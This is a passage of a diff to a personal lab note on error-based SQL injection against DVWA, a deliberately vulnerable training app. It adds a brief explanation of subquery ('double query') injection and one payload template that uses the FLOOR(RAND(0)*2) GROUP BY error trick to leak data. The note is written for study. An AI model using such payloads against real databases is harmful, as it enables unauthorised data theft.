U53RW4R3/SCPA/SCPA Phases/Tactics && Techniques && Procedures (TTPs) Phases/WebApp Hacking/Injection/SQL Injection/01 - In-Band SQL Injection/Lab Simulation/01 - DVWA/Difficulty/Low/Manual/03 - Error-Based Query SQL Injection/01 - Database Reconnaissance.md

 Search Tag(s): #sql-injection #error-based #dvwa

-## 1.1 - SubQuery Injection
+## 1.1 - SubQuery (Double Query) Injection

-TODO: Fill the information with a step by step approach using error-based subquery SQL injection
+- Subquery injection is often referred as double injection.
+It is the second method other than union technique.
+In contrast, the SQL query is more difficult to read yet it can serve as alternative to retrieve data.

 ```sql
 1' OR (SELECT 1 FROM (SELECT COUNT(*),CONCAT((<SQL_Payload>),':',FLOOR(RAND(0) * 2)) grouped_table FROM information_schema.tables GROUP BY grouped_table) tblname_alias)#